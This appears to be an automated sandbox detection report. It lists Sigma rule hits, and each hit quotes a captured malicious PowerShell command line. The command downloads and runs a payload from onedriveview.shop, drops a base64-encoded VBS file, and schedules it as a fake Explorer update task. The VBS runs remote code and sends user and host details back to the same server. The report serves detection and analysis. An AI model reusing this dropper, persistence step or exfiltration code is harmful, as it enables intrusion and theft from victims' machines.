              Source: Process startedAuthor: Florian Roth (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious PowerShell Parameter Substring
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Daniel Bohannon (idea), Roberto Rodriguez (Fix): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious Script Execution From Temp Folder
              Source: Process startedAuthor: Florian Roth (Nextron Systems), Max Altgelt (Nextron Systems), Tim Shelton: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: WScript or CScript Dropper
              Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1044, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\Public\Libraries\Libraries.vbs" , ProcessId: 6908, ProcessName: wscript.exe
              Sigma detected: Windows Shell/Scripting Application File Write to Suspicious Folder
              Source: File createdAuthor: Florian Roth (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6928, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: Change PowerShell Policies to an Insecure Level
              Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Potential Binary Or Script Dropper Via PowerShell
              Source: File createdAuthor: frack113, Nasreddine Bencherchali (Nextron Systems): Data: EventID: 11, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ProcessId: 6928, TargetFilename: C:\Users\Public\Libraries\Libraries.vbs
              Sigma detected: PowerShell Web Download
              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7J
              Sigma detected: Suspicious PowerShell Invocations - Specific - ProcessCreation
              Source: Process startedAuthor: Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', $dd);&$home\appdata\local\temp\sklyar.pdf;$a='ZGltIHIsIGMKc2V0IHIgPSBjcmVhdGVvYmplY3QoIldTY3JpcHQuU2hlbGwiKQpjID0gInBvd2Vyc2hlbGwuZXhlIC1leGVjdXRpb25wb2xpY3kgYnlwYXNzIC13IGhpZGRlbiAtbm9wcm9maWxlIC1jIHN0YXJ0LXNsZWVwIDM5O3N0YXJ0LXNsZWVwIChnZXQtcmFuZG9tIC1taW4gNSAtbWF4IDQzKTtzdGFydC1zbGVlcCAxMTskaWlrPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDskcmMgPSAtam9pbiAoKDQ4Li41NykgfCBnZXQtcmFuZG9tIC1jb3VudCggZ2V0LXJhbmRvbSAtbWluIDUgLW1heCAxNSkgfCBmb3JlYWNoLW9iamVjdCB7IFtjaGFyXSRffSkgKyAnLnR4dCc7JGZsbT0kaWlrLmRvd25sb2FkZGF0YSgnaHR0cHM6Ly9vbmVkcml2ZXZpZXcuc2hvcC9hcGkvdmFsdWVzLzgyOTgwNDY0MjQzODIyMTE1NzAwL3JlZnJlc2g4MS8nKyRyYyk7aWYoJGZsbS5MZW5ndGggLWd0IDEpeyRqa3I9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6dXRmOC5nZXRTdHJpbmcoJGZsbSk7aWYoJGprciAtbWF0Y2ggJ2dldC1jb250ZW50Jyl7W2J5dGVbXV0gJGRycHk9SUVYICRqa3I7fWVsc2V7JGJqZG89d2hvYW1pOyRiamRvKz0nPT0nOyRiamRvKz1bU3lzdGVtLk5ldC5EbnNdOjpHZXRIb3N0QWRkcmVzc2VzKCRpcCkrW1N5c3RlbS5FbnZpcm9ubWVudF06Ok5ld0xpbmU7JGhibj1JRVggJGprcjskYmpkbys9JGhibnxPdXQtc3RyaW5nO1tieXRlW11dJGRycHk9W3N5c3RlbS50ZXh0LmVuY29kaW5nXTo6VXRmOC5HZXRCeXRlcygkYmpkbyk7fTtzdGFydC1zbGVlcCAxMDskdWprPW5ldy1vYmplY3QgbmV0LndlYmNsaWVudDtzdGFydC1zbGVlcCAxNjskdWprLnVwbG9hZGRhdGEoJ2h0dHBzOi8vb25lZHJpdmV2aWV3LnNob3AvYXBpL3ZhbHVlcy9yZWZyZXNoODEnLCRkcnB5KTt9IgpyLlJ1biBjLCAwLCBmYWxzZQ==';$b=[System.Convert]::FromBase64String($a);$c=[System.Text.Encoding]::utf8.GetString($b);set-content C:\Users\Public\Libraries\Libraries.vbs -value $c;schtasks.exe /create /TN ExplorerCoreUpdateTaskMachine /SC minute /mo 3 /tr C:\Users\Public\Libraries\Libraries.vbs /f;, CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden -nop -noni -exec bypass -c $w=new-object system.net.webclient;$d=$w.downloadstring('https://onedriveview.shop/api/values/view/sklyar.txt'); $dd = [System.Convert]::FromBase64String($d);[System.IO.File]::WriteAllBytes($home+'\appdata\local\temp\sklyar.pdf', 